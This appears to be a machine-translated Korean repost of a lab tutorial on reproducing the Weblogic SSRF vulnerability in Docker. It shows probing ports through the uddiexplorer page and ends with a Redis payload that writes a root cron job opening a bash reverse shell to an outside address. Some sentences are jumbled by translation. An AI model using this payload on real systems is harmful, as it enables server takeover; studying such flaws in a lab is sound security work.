Weblogic SSRF 취약점을 재현하는 방법

王林
풀어 주다: 2023-05-14 20:04:04
앞으로
1386명이 탐색했습니다.

1. Docker를 사용하여 환경 구축

Docker 설치 및 환경 구축 튜토리얼: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

액세스 포트 7001如何实现Weblogic SSRF漏洞复现

2.

1. 페이지/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2에 취약점이 존재합니다. 2. IBM 사이트를 확인하여

如何实现Weblogic SSRF漏洞复现

연결인지 확인하세요. 이는 SSRF가 존재할 수 있음을 의미합니다

3. Burp Suite를 사용하여 패킷 캡처

如何实现Weblogic SSRF漏洞复现

4. 연산자 매개변수 연결 수정如何实现Weblogic SSRF漏洞复现

5. 존재하지 않는 포트에 대한 액세스는 HTTP如何实现Weblogic SSRF漏洞复现

를 통해 연결할 수 없습니다.

기존 포트에 액세스하면 상태 코드가 반환됩니다.

如何实现Weblogic SSRF漏洞复现

인트라넷에 액세스

如何实现Weblogic SSRF漏洞复现

redis를 사용하여 셸 페이로드를 리바운드하세요

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
로그인 후 복사

위 내용은 Weblogic SSRF 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:yisu.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿